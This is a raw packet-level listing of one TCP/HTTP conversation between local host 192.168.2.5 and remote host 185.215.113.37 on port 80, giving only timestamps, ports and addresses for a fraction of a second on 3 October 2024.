Oct 3, 2024 21:36:14.816693068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816699028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.816709995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816720009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816729069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.816736937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816745996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816752911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.816761971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816770077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.816778898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816793919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.816800117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.816817045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.816842079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.817503929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.817514896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.817524910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.817536116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.817547083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.817552090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.817564011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.817574024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.817579985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.817590952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.817598104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.817606926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.817614079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.817622900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.817635059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.817643881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.817672014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.831835985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.831846952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.831887960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.831907034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.831980944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.831990957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.832001925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.832020044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.832037926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.832144022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.832154036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.832176924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.832206964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.899463892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.899501085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.899512053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.899523020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.899542093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.899662018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.899672031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.899681091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.899688005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.899696112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.899720907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.899768114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.899776936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.899786949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.899802923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.899833918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.899925947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.899935961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.899945021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.899955034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.899965048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.899988890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.900172949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900182962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900192022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900201082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900212049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900218010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.900240898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.900266886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.900361061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900371075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900379896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900408030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.900422096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.900593042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900603056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900612116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900620937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900630951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900638103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.900646925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900655985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900662899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.900671959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.900681019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.900701046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.900995016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901004076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901012897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901022911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901032925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901038885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901047945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901057959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901066065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901093006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901388884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901398897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901407003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901417017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901426077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901432991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901442051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901448965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901458025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901473045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901485920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901499987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901535988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901777029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901786089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901794910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901804924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901813030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901820898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901830912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901834965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901844978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901856899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901860952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901870012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901881933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901886940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901896000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901906013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901911974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901930094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901942015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.901952982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.901969910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.902568102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.902578115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.902585983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.902596951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.902606010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.902612925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.902621984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.902635098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.902638912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.902647972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.902653933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.902662039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.902671099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.902677059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.902688026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.902697086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.902702093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.902713060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.902723074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.902728081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.902744055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.902760983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.903223038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903232098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903242111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903250933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903259993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903266907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.903275013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903289080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903292894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.903301954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903307915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.903316975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903333902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.903362036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.903765917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903780937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903789997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903800011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903808117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.903815985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903827906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903831959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.903841019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903851032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903860092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.903867006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.903872013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903882027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903892040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.903898954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903908968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903918028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903927088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.903933048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903942108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903954029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903959036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.903970957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.903978109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.903987885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.904017925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.904633045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.904643059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.904652119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.904668093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.904676914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.904695988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.904701948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.904710054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.904720068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.904726982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.904736042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.904752016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.904781103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.919238091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.919245958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.919405937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.919414997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.919424057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.919430971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.919439077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.919477940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.919490099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.919493914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.919533968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.919548988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.919576883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.986949921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987140894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.987250090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987260103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987276077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987287045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987298965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987307072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.987314939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987325907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987360954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.987371922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.987473011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987483025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987492085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987510920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987519026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.987529039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987546921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.987561941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.987653017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987663031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987673998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987698078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.987721920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.987875938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987909079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987927914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987938881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987943888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.987952948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987963915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.987968922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987978935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987988949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.987998962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.988006115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988012075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.988022089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988029003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.988053083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.988332033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988342047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988380909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.988548994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988562107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988580942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988591909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988598108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.988606930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988614082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.988622904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988632917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988641977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.988648891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988658905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988672018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988677025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.988687992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988692999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.988703966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.988708973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.988729000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.988743067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.989316940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989327908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989336967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989347935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989357948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989367962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989373922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.989383936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989393950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989401102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.989409924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989418030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.989425898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989437103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989443064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.989450932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989461899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989470005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.989476919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989490032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.989499092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.989509106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.989523888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.989538908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.990099907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990111113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990119934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990128994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990139008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990149021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990158081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990164042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.990173101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990181923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990191936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990199089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.990207911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990214109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.990221977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990231037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.990237951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990248919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990258932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.990284920 CEST	49704	80	192.168.2.5	185.215.113.37
